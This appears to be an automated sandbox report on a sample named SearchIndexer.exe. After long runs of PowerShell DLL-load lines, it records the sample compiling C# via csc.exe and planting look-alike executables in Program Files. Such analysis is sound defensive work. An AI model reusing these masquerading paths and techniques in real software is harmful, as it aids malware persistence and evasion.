Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll

Source: C:\Users\user\Desktop\SearchIndexer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Directory created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Directory created: C:\Program Files\Windows Photo Viewer\9e8d7a4ca61bd9			Jump to behavior

Source: SearchIndexer.exe

Static file information: File size 3746304 > 1048576

Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: AppSharingHookController.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2rcross\x-none\appsharinghookcontroller.pdb source: AppSharingHookController.exe.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP source: msedge_pwa_launcher.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\clview.pdb source: CLVIEW.EXE.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb source: msedge_pwa_launcher.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.0.dr
Source:	Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: DATABASECOMPARE.EXE.0.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb source: integrator.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb source: SDXHelper.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\graph.pdb source: GRAPH.EXE.0.dr
Source:	Binary string: r.pdb source: AppSharingHookController.exe.0.dr
Source:	Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.0.dr
Source:	Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.0.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: integrator.exe.0.dr
Source:	Binary string: VSTOInstaller.pdb source: VSTOInstaller.exe.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.pdb source: SearchIndexer.exe, 00000001.00000002.1913109715.0000000003888000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\graph.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: GRAPH.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\clview.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CLVIEW.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SDXHelper.exe.0.dr
Source:	Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb source: Common.DBConnection64.exe.0.dr
Source:	Binary string: lper.pdb source: SDXHelper.exe.0.dr
Source:	Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: MicrosoftEdgeUpdate.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline"
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\SearchIndexer.exe	Code function: 0_3_022370AF push eax; ret	0_3_022370B3
Source: C:\Users\user\Desktop\SearchIndexer.exe	Code function: 0_3_022377BA push eax; ret	0_3_022377BE
Source: C:\Users\user\Desktop\SearchIndexer.exe	Code function: 0_3_022373DE push eax; ret	0_3_022373E2
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B8953E3 push ds; ret	1_2_00007FFD9B8953F3
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B894BB0 push ebp; retf	1_2_00007FFD9B894BBC
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B89611B pushad ; ret	1_2_00007FFD9B89612D
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B8C5C7E push edi; retf	1_2_00007FFD9B8C5C86
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B9F340D push ss; ret	1_2_00007FFD9B9F340E
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9B9F2D05 push ds; retf 0009h	1_2_00007FFD9B9F2D06
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC5542C push ss; iretd	1_2_00007FFD9BC5557A
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC55BA4 pushad ; iretd	1_2_00007FFD9BC55BC2
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC55BC4 pushad ; iretd	1_2_00007FFD9BC55BC2
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC55ACF push ebp; iretd	1_2_00007FFD9BC55AC2
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC55A81 push edx; iretd	1_2_00007FFD9BC55A82
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC55A84 push ebp; iretd	1_2_00007FFD9BC55AC2
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 1_2_00007FFD9BC5795D push ebx; retf	1_2_00007FFD9BC5796A
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Code function: 51_2_00007FFD9B8A53E3 push ds; ret	51_2_00007FFD9B8A53F3
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Code function: 51_2_00007FFD9B8A4BB0 push ebp; retf	51_2_00007FFD9B8A4BBC
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Code function: 51_2_00007FFD9B8A611B pushad ; ret	51_2_00007FFD9B8A612D
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Code function: 53_2_00007FFD9B8953E3 push ds; ret	53_2_00007FFD9B8953F3
